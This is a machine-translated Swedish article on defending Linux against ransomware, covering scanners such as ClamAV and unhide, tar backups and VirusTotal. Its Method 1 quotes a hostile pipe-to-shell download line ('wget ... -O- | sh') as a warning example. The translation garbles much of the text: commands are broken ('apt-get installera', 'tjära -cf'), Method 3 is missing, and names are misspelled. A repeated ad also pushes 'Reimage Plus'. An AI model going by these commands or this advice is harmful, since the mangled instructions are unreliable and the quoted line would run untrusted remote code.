Hur skyddar du Linux från Ransomwares

Ransomware är ett av de hotande problemen i nätverkssäkerhet idag. Det är skrämmande att tro att någon kunde hålla din data gisslan. Vissa ransomware-infektioner krypterar all data på en viss volym, och individerna bakom det kräver en viss summa pengar innan de kommer överens om att släppa nyckeln som behövs för att låsa upp nämnda data. Det gäller särskilt för människor som har mycket pengar investerat i sina uppgifter. Det finns dock lite bra nyheter för Linux-användare.

Under de flesta situationer är det svårt för ransomware-koden att få kontroll över någonting mer än bara en användares hemkatalog. Dessa program har inte behörighet att skräp en hel installation. Det är därför Linux ransomware är ett större problem på servrar där operatörer alltid har root-åtkomst. Ransomware borde inte vara mycket av ett problem för Linux-användare, och det finns flera steg att vidta för att förhindra att det händer med dig.

Metod 1: Försvar mot BashCrypt-stilattacker

BasyCrypt är ett bevis på konceptet ransomware som visat att det är möjligt att infektera serverns strukturer med denna typ av skadlig kod. Detta ger en grundlinje för vilka Linux-ransomware-paket som kan se ut. Medan de för närvarande är ovanliga, fungerar samma förebyggande åtgärder för serverns administratörer av andra plattformar lika bra för det här. Problemet är att i företagsnivåmiljöer kan det finnas ett stort antal olika personer som använder ett värdsystem.

Om du kör en e-postserver kan det vara väldigt svårt att hålla människor från att göra dumma saker. Gör ditt bästa för att påminna alla om att inte öppna bilagor som de inte är säkra på, och alltid skadlig kod skanna allt i fråga. En annan sak som verkligen kan bidra till att förhindra dessa typer av attacker kommer från att titta på hur du installerar binärer med wget. Naturligtvis saknar din mailserver förmodligen en skrivbordsmiljö helt och säkert, och du använder förmodligen wget, apt-get, yum eller pacman för att hantera paket som kommer över. Det är väldigt viktigt att titta på vilka arkiv som används i dessa installationer. Ibland ser du antingen ett kommando som vill att du ska utföra något som wget http: //www.thisisaprettybadcoderepo.webs/ -O- | sh, eller det kan vara inne i ett skalskript. På något sätt, kör inte det om du inte vet vad det förvaret är för.

Metod 2: Installera ett skannerpaket

Flera bitar av öppen källkodsskanningsteknik finns. ClamAV är överlägset mest känd, och du kan installera den på många apt-baserade distributioner genom att använda:

sudo apt-get installera clamav

När det är installerat, bör man clamav förklara användningen i vanligt språk. Tänk på att även om det kan skanna och ta bort infekterade filer, kan det inte ta bort smittsam kod från en fil. Det här är en helt eller ingenting situation.

Det finns en andra scanner du kanske inte känner till, men det är användbart om dolda processer är vad skrämmer dig. Återigen om du använder en apt-baserad distribution, löser du det här kommandot för att installera unhide-skannern:

sudo apt-get install unhide

PRO TIPS: Om problemet är med din dator eller en bärbar dator, bör du försöka använda Reimage Plus-programvaran som kan skanna förvaret och ersätta korrupta och saknade filer. Detta fungerar i de flesta fall där problemet uppstått på grund av systemkorruption. Du kan ladda ner Reimage Plus genom att klicka här

När det är installerat, skriv:

sudo unhide sys

Detta gör en fullständig genomsökning av ditt system för alla dolda processer.

Metod 4: Håller rena säkerhetskopior på sidan

Även om detta inte ens skulle vara ett problem eftersom alla alltid ska göra säkerhetskopior, kan ha bra säkerhetskopior direkt sätta ut ransomware. Vilken liten ransomware finns på Linux-plattformen tenderar att attackera filer med tillägg som är specifika för webbutvecklingsplattformar. Det betyder att om du har ett ton av .php, .xml eller .js-kod som sitter runt, vill du specifikt säkerhetskopiera detta. Tänk på följande kod:

tjära -cf backups.tar $ (find -name * .ruby-eller -namn * .html)

Detta borde skapa en stor bandarkivfil av varje fil med .ruby och .html-tilläggen i en filstruktur. Det kan sedan flyttas till en annan temporär underkatalog för utvinning för att säkerställa att det skapas fungerade ordentligt.

Detta tejparkiv kan och bör flyttas till en extern volym. Du kan naturligtvis använda .bz2, .gz eller .xv-komprimering innan du gör det. Du kanske vill skapa speglade säkerhetskopior genom att kopiera den till två olika volymer.

Metod 5: Använda webbaserade skannrar

Kanske har du laddat ner ett RPM- eller DEB-paket från en webbplats som lovar att innehålla användbar programvara. Programvaran distribueras också via 7z eller komprimerade tjärfiler. Mobila användare kan också få Android-paket i APK-format. Det är enkelt att skanna dessa med ett verktyg direkt i din webbläsare. Peka det på https://www.virustotal.com/, och när sidan laddas, tryck på knappen Välj fil. Innan du laddar upp, kom ihåg att det här är en offentlig server. Medan det är säkert och drivs av Alphabet Inc, överför det filer offentligt, vilket kan vara ett problem i vissa supersäkra miljöer. Det är också begränsat till 128 MB filer.

Välj din fil i rutan som kommer upp och välj öppen. Filnamnet kommer att visas i raden bredvid knappen när rutan försvinner.

Klicka på den stora blåa Skanna den! knapp. Du kommer att se en annan ruta som indikerar att systemet laddar upp filen.

Om någon redan checkat ut filen på förhand, kommer den att meddela dig om föregående rapport. Det erkänner detta baserat på en SHA256 summa, som fungerar på samma sätt som samma Linux-kommandoradsverktyg som du är van vid. Om inte, kommer den att köra en fullständig genomsökning med 53 olika skanningsprogram. Några av dem kan ta slut när filen körs, och dessa resultat kan säkert ignoreras.

Vissa program kan returnera olika resultat än andra, så det är lätt att klä ut falska positiva effekter med det här systemet. Det bästa är att det fungerar mellan olika plattformar, vilket gör det lika attraktivt oavsett vilken distribution du har på olika enheter. Det fungerar också lika bra från mobila distributioner som Android, och det är därför det är ett bra sätt att inspektera APK-paket innan du använder dem.

PRO TIPS: Om problemet är med din dator eller en bärbar dator, bör du försöka använda Reimage Plus-programvaran som kan skanna förvaret och ersätta korrupta och saknade filer. Detta fungerar i de flesta fall där problemet uppstått på grund av systemkorruption. Du kan ladda ner Reimage Plus genom att klicka här

Facebook Twitter Google Plus Pinterest